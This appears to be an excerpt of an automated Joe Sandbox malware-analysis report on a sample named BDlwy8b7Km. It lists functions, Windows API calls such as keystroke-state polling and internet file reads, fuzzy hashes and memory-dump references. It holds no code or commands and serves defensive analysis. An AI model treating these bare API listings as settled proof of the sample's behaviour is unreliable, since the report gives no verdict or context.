                                                  • Opcode ID: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
                                                  • Instruction ID: 3227eb7bf93ce2069dd5ca52d89e59e8417c3a585b2761515ac94c25856e35b6
                                                  • Opcode Fuzzy Hash: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
                                                  • Instruction Fuzzy Hash: 03512935604205DFDB15DF58C4988EDBBB2FF89364F098099E8069B362DB31ED86CB91
                                                  Function 00626B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00626C33
                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00626C4A
                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00626C73
                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0060AB79,00000000,00000000), ref: 00626C98
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00626CC7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MessageSendShow
                                                  • String ID:
                                                  • API String ID: 3688381893-0
                                                  • Opcode ID: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
                                                  • Instruction ID: 8b092e2b85d9283e39c9b7ee07f8fe979cd9d6c35b79dbc5d9fdc0c2cc4ac2f2
                                                  • Opcode Fuzzy Hash: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
                                                  • Instruction Fuzzy Hash: B241A035704924AFDB24AF28DC58FE97BA6EB09360F150268F895A73E0C371AD52CF50
                                                  Function 005C2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
                                                  • Instruction ID: 761fc567f157e6591b206f604744b52883c381fc7b85b3fa9c6d4a49bbfbc484
                                                  • Opcode Fuzzy Hash: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
                                                  • Instruction Fuzzy Hash: A7417D76A002049FCB24DFA8C885A5DBBA5FF89714F1545ADE615EB292DA31AE01CB80
                                                  Function 005A912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 005A9141
                                                  • ScreenToClient.USER32(00000000,?), ref: 005A915E
                                                  • GetAsyncKeyState.USER32(00000001), ref: 005A9183
                                                  • GetAsyncKeyState.USER32(00000002), ref: 005A919D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
                                                  • Instruction ID: c1a3b6c3d1db82c713cc060a7196f117c6c316c89c572a6cbf2ba00ad91ca0d6
                                                  • Opcode Fuzzy Hash: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
                                                  • Instruction Fuzzy Hash: D1417F31A0865BBBDF199F64C848BEEBB75FF0A324F208219E465A72D0C7346950CF91
                                                  Function 00603874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetInputState.USER32 ref: 006038CB
                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00603922
                                                  • TranslateMessage.USER32(?), ref: 0060394B
                                                  • DispatchMessageW.USER32(?), ref: 00603955
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                  • String ID:
                                                  • API String ID: 2256411358-0
                                                  • Opcode ID: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
                                                  • Instruction ID: 6dfc569d6ede0974bf803ca01b5773c7ea6f2d645cbe97af5aa9401bb950ac95
                                                  • Opcode Fuzzy Hash: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
                                                  • Instruction Fuzzy Hash: 2E31E8709847519EEB39CB359808BF737AEAB02302F08056DD452963D0F3F49A85CB51
                                                  Function 0060CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CF38
                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0060CF6F
                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFB4
                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFC8
                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFF2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                  • String ID:
                                                  • API String ID: 3191363074-0
                                                  • Opcode ID: 6deafa61f1960fbd1c4166cdbba35725bbb560cc50804c700b286d1e6cd2eda0
                                                  • Instruction ID: 05db2b5fbaa89a3f8d1d1758f9e4db109ad6d2a41b7c97c0b7da58a01a7fc224
                                                  • Opcode Fuzzy Hash: 6deafa61f1960fbd1c4166cdbba35725bbb560cc50804c700b286d1e6cd2eda0
                                                  • Instruction Fuzzy Hash: BD315E71540606EFDB28DFA5C8849AFBBFAEF54364B10452EF506D2281DB30AE42DB61
                                                  Function 005F1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 005F1915
                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 005F19C1
                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 005F19C9
                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 005F19DA
                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005F19E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
                                                  • Instruction ID: f01d71876cc23228f2eadc300d16a872238b09ce2b05b6eef089629b0965772c
                                                  • Opcode Fuzzy Hash: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
                                                  • Instruction Fuzzy Hash: E231D37190061DEFCB14CFA8CE59AEE3BB6FB44324F004229FA21A72D0C7B49954DB90
                                                  Function 00625706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00625745
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0062579D
                                                  • _wcslen.LIBCMT ref: 006257AF
                                                  • _wcslen.LIBCMT ref: 006257BA
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_wcslen
                                                  • String ID:
                                                  • API String ID: 763830540-0
                                                  • Opcode ID: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
                                                  • Instruction ID: 4989a3767625ba71620d45139e7548172db13ac85af81a9eb7ed877d79b3a52f
                                                  • Opcode Fuzzy Hash: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
                                                  • Instruction Fuzzy Hash: 97219971904A28DADB309F64EC45AEDBBBAFF44724F108216F92ADB280D770D985CF50
                                                  Function 00610930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00610951
                                                  • GetForegroundWindow.USER32 ref: 00610968
                                                  • GetDC.USER32(00000000), ref: 006109A4
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 006109B0
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 006109E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
                                                  • Instruction ID: 03799fc358fbe5d8bf159086ac3a979e5b6199c674ace72a8a965648a0267877
                                                  • Opcode Fuzzy Hash: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
                                                  • Instruction Fuzzy Hash: B121A135600204AFEB14EF64D888AAFBBF6FF44710F04846CE84A97762DB70AC45CB90
                                                  Function 005CCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 005CCDC6
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CCDE9
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005CCE0F
                                                  • _free.LIBCMT ref: 005CCE22
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CCE31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
                                                  • Instruction ID: 1dd9259f8ef0af844a8cbabd94c42c3f44f3226001d664a43093589a67b4368c
                                                  • Opcode Fuzzy Hash: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
                                                  • Instruction Fuzzy Hash: 46018472602A157F632256F66C8DE7F6D6DFEC7BA1315012DFD0AC7201EA618D0281F0
                                                  Function 005A9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                  • SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                  • BeginPath.GDI32(?), ref: 005A96B9
                                                  • SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
                                                  • Instruction ID: 4fa1b58a276c55c676245f32627023ed1bafc28d2095c122b5e8c52c7dcefc55
                                                  • Opcode Fuzzy Hash: 0fd3c0c2f3cd9c001e1e6b55fd071027d777b58f63bddfd48616f780cd53141f
                                                  • Instruction Fuzzy Hash: AF216D30802219EBEB119F65DC197AD3FAABF42325F181316F410AB1A0D3B05891CFD4
                                                  Function 005F5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
                                                  • Instruction ID: 8c3e4d3d07322c1fd2ba9fa75129a9d8db1765505c310c108703dfa236c7a0dc
                                                  • Opcode Fuzzy Hash: 1c61101f5e4b85bdb7a71536c1a91db29c01f0403ca22fa40e53fda468e991a1
                                                  • Instruction Fuzzy Hash: BF01D661286E1DBB924862119D42EFB7B9DFB603D4B404430FF069A241F624FD1086A4
                                                  Function 005C2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,005BF2DE,005C3863,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6), ref: 005C2DFD
                                                  • _free.LIBCMT ref: 005C2E32
                                                  • _free.LIBCMT ref: 005C2E59
                                                  • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E66
                                                  • SetLastError.KERNEL32(00000000,00591129), ref: 005C2E6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
                                                  • Instruction ID: 0c79eaa9748313d3b83a0dada578af86f7a1994ab60028ae2cda666c43d1f995
                                                  • Opcode Fuzzy Hash: 52c429a4d11d6c55f1a043a29e0057cceb6606161428affb5906af5de2a69251
                                                  • Instruction Fuzzy Hash: D801F436205A056FDB22A7F56C49F3F2E6EBBD13B5F21882CF425B2192EA308C018020
                                                  Function 005F000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0070
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
                                                  • Instruction ID: 525f7044c93b478889f2979391e74a27ac908ed2eb3482908e686ae221040337
                                                  • Opcode Fuzzy Hash: 5246cd0ebb5bf50e90d36169c75e62fd7a9349b18b4e183a4e0cc2089a74bff8
                                                  • Instruction Fuzzy Hash: DA01BC72600608BBDB204F69DC08BBE7EAEEB44361F18A424FA01D2251DB78DD409BA0
                                                  Function 005FE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 005FE997
                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 005FE9A5
                                                  • Sleep.KERNEL32(00000000), ref: 005FE9AD
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 005FE9B7
                                                  • Sleep.KERNEL32 ref: 005FE9F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
